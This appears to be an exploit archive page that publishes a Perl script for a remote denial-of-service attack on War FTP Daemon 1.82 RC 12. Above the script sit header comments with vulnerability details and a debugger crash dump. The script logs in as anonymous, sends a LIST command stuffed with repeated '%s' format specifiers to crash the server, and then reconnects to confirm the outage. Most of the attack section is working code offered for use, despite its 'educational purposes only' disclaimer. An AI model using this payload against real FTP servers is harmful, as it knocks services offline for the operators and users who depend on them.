what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

War FTP Daemon Format String Denial Of Service

War FTP Daemon Format String Denial Of Service
Posted Sep 10, 2009
Authored by corelanc0d3r

War FTPd version 1.82 RC 12 format string denial of service exploit that makes use of the LIST command.

tags | exploit, denial of service
SHA-256 | 2b9e152a8527b287501a34450739c725496b9fef5e60fefd0c238f53aafcc674

War FTP Daemon Format String Denial Of Service

Change Mirror Download
# [*] Vulnerability     : War FTP Daemon Format String DoS (LIST command)
# [*] Detected by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Type : remote DoS
# [*] OS : Windows
# [*] Product : Jgaa's War FTP Daemon
# [*] Versions affected : 1.82 RC 12
# [*] Download link : http://www.warftp.org/?menu=344
# [*] -------------------------------------------------------------------------
# [*] Method : format string, only works with anonymous access
# [*] Crash information
#(8cc.598): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000001 ebx=0076e7b0 ecx=00000073 edx=00000002 esi=0076e6fe edi=0000000a
#eip=00431680 esp=0076e6c0 ebp=00a1114a iopl=0 nv up ei pl nz na po nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202

#war_ftpd+0x31680:
#00431680 8a08 mov cl,byte ptr [eax] ds:0023:00000001=??
#0:001> d ebp
#00a1114a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a1115a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a1116a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a1117a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a1118a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a1119a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a111aa 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#00a111ba 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s%
#
#
# [*] Greetz&Tx to : Saumil/SK/hack4love/str0ke
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
#
use IO::Socket;
if ($#ARGV ne 1) {
print " usage: $0 <targetip> <targetport>\n";
exit(0);
}

my $user="anonymous";
my $pass="anonymous@me.com";

print " [+] Preparing DoS payload\n";
my $payload=("%s" x 300);
my $payload2 = "A" x 5000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');

$ftp = <$sock> || die " [!] *** Unable to connect ***\n";
print " ** $ftp";
$ftp = <$sock>;
print " ** $ftp";
$ftp = <$sock>;
print " ** $ftp";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n";
$ftp = <$sock>;
print " ** $ftp";
print $sock "PASS $pass\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Sending payload\n";
print $sock "LIST ".$payload."\r\n";
print $sock "BOOM !\r\n";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print " ** $ftp2\n";
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close